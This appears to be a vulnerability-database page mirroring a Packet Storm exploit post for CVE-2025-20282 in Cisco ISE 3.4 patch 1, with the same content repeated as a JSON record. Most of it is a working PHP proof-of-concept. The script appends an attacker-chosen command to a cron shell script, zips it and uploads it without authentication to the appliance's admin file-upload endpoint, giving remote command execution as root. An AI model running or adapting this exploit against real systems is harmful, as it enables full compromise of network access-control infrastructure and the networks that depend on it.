📄 Cisco ISE 3.4 Code Execution / Privilege Escalation /...

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

An unauthenticated file upload vulnerability was identified in the administrative file upload endpoint of Cisco ISE version 3.4 patch 1. The application accepts ZIP archives without authentication and extracts files into sensitive execution paths. An...

Visit Original Source

Basic Information

ID PACKETSTORM:214117

Published Jan 21, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Cisco ISE 3.4 Patch 1 Unauthenticated Arbitrary File Upload via ZIP Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.cisco.com |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/210756/ & CVE-2025-20282

[+] Summary : An unauthenticated file upload vulnerability was identified in the administrative file upload endpoint.
The application accepts ZIP archives without authenticationand extracts files into sensitive execution paths.
An attacker can craft a ZIP archive containing a modified cron shell script
and upload it to the vulnerable endpoint, leading to arbitrary command execution.

[+] Impact:

- Remote Command Execution
- Privilege Escalation
- Full System Compromise

[+] Attack Vector:

Remote / Network

[+] PoC : php poc.php --ip 192.168.1.100 --command "malicious_command_here"

<?php

if (php_sapi_name() !== 'cli') {
die("This script must be run from CLI only.\n");
}

/* ---------------- Argument Parsing ---------------- */

$options = getopt("", ["reset", "command:", "ip:"]);

if (!isset($options['command']) || !isset($options['ip'])) {
echo "Usage: php poc.php --command=\"<cmd>\" --ip=\"<target>\" [--reset]\n";
exit(1);
}

$COMMAND = $options['command'];
$IP = $options['ip'];
$RESET = isset($options['reset']);

/* ---------------- Original Encoded Payload ---------------- */

/**
* Original file under /opt/CSCOcpm/bin/
* Filename: isehourlycron.sh
*/
$isehourlycron = "++++++"; // Base64 placeholder

$decoded_data = base64_decode($isehourlycron);

/* ---------------- File System Setup ---------------- */

$binDir = __DIR__ . "/bin";
if (!is_dir($binDir)) {
mkdir($binDir, 0755, true);
}

$filePath = $binDir . "/isehourlycron.sh";

/* ---------------- Write Logic ---------------- */

$fileHandle = fopen($filePath, "w");
fwrite($fileHandle, $decoded_data);

if ($RESET) {
echo "[+] File has been reset\n";
} else {
fwrite($fileHandle, $COMMAND);
}

fclose($fileHandle);

/* ---------------- ZIP Creation ---------------- */

$zipFile = __DIR__ . "/output.zip";
$zip = new ZipArchive();

if ($zip->open($zipFile, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
die("[-] Cannot create zip archive\n");
}

$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($binDir),
RecursiveIteratorIterator::LEAVES_ONLY
);

foreach ($files as $name => $file) {
if (!$file->isDir()) {
$filePath = $file->getRealPath();
$relativePath = substr($filePath, strlen(__DIR__) + 1);
$zip->addFile($filePath, $relativePath);
}
}

$zip->close();

/* ---------------- Upload via cURL ---------------- */

echo "[*] Uploading file unauthenticated...\n";

$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => "https://" . $IP . "/admin/files-upload/",
CURLOPT_POST => true,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_POSTFIELDS => [
'file' => new CURLFile($zipFile)
]
]);

$response = curl_exec($ch);
curl_close($ch);

echo "[+] Upload completed\n";

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-01-21T15:43:58",
    "description": "An unauthenticated file upload vulnerability was identified in the administrative file upload endpoint of Cisco ISE version 3.4 patch 1. The application accepts ZIP archives without authentication and extracts files into sensitive execution paths. An...",
    "published": "2026-01-21T00:00:00",
    "modified": "2026-01-21T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Cisco ISE 3.4 Code Execution / Privilege Escalation / Shell Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214117",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-20282"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Cisco ISE 3.4 Patch 1 Unauthenticated Arbitrary File Upload via ZIP Injection                                               |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://www.cisco.com                                                                                                      |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/210756/ & CVE-2025-20282\n    \n    [+] Summary    : An unauthenticated file upload vulnerability was identified in the administrative file upload endpoint. \n                     The application accepts ZIP archives without authenticationand extracts files into sensitive execution paths.\n                     An attacker can craft a ZIP archive containing a modified cron shell script\n                     and upload it to the vulnerable endpoint, leading to arbitrary command execution.\n    \n    [+] Impact:\n    \n    - Remote Command Execution\n    - Privilege Escalation\n    - Full System Compromise\n    \n    [+] Attack Vector:\n    \n    Remote / Network\n    \n    [+] PoC : php poc.php --ip 192.168.1.100 --command \"malicious_command_here\"\n    \n    <?php\n    \n    if (php_sapi_name() !== 'cli') {\n        die(\"This script must be run from CLI only.\\n\");\n    }\n    \n    /* ---------------- Argument Parsing ---------------- */\n    \n    $options = getopt(\"\", [\"reset\", \"command:\", \"ip:\"]);\n    \n    if (!isset($options['command']) || !isset($options['ip'])) {\n        echo \"Usage: php poc.php --command=\\\"<cmd>\\\" --ip=\\\"<target>\\\" [--reset]\\n\";\n        exit(1);\n    }\n    \n    $COMMAND = $options['command'];\n    $IP      = $options['ip'];\n    $RESET   = isset($options['reset']);\n    \n    /* ---------------- Original Encoded Payload ---------------- */\n    \n    /**\n     * Original file under /opt/CSCOcpm/bin/\n     * Filename: isehourlycron.sh\n     */\n    $isehourlycron = \"++++++\"; // Base64 placeholder\n    \n    $decoded_data = base64_decode($isehourlycron);\n    \n    /* ---------------- File System Setup ---------------- */\n    \n    $binDir = __DIR__ . \"/bin\";\n    if (!is_dir($binDir)) {\n        mkdir($binDir, 0755, true);\n    }\n    \n    $filePath = $binDir . \"/isehourlycron.sh\";\n    \n    /* ---------------- Write Logic ---------------- */\n    \n    $fileHandle = fopen($filePath, \"w\");\n    fwrite($fileHandle, $decoded_data);\n    \n    if ($RESET) {\n        echo \"[+] File has been reset\\n\";\n    } else {\n        fwrite($fileHandle, $COMMAND);\n    }\n    \n    fclose($fileHandle);\n    \n    /* ---------------- ZIP Creation ---------------- */\n    \n    $zipFile = __DIR__ . \"/output.zip\";\n    $zip = new ZipArchive();\n    \n    if ($zip->open($zipFile, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {\n        die(\"[-] Cannot create zip archive\\n\");\n    }\n    \n    $files = new RecursiveIteratorIterator(\n        new RecursiveDirectoryIterator($binDir),\n        RecursiveIteratorIterator::LEAVES_ONLY\n    );\n    \n    foreach ($files as $name => $file) {\n        if (!$file->isDir()) {\n            $filePath = $file->getRealPath();\n            $relativePath = substr($filePath, strlen(__DIR__) + 1);\n            $zip->addFile($filePath, $relativePath);\n        }\n    }\n    \n    $zip->close();\n    \n    /* ---------------- Upload via cURL ---------------- */\n    \n    echo \"[*] Uploading file unauthenticated...\\n\";\n    \n    $ch = curl_init();\n    curl_setopt_array($ch, [\n        CURLOPT_URL            => \"https://\" . $IP . \"/admin/files-upload/\",\n        CURLOPT_POST           => true,\n        CURLOPT_RETURNTRANSFER => true,\n        CURLOPT_SSL_VERIFYPEER => false,\n        CURLOPT_SSL_VERIFYHOST => false,\n        CURLOPT_POSTFIELDS     => [\n            'file' => new CURLFile($zipFile)\n        ]\n    ]);\n    \n    $response = curl_exec($ch);\n    curl_close($ch);\n    \n    echo \"[+] Upload completed\\n\";\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/214117",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214117/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Cisco ISE 3.4 Code Execution / Privilege Escalation / Shell Upload_PACKETSTORM:214117

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply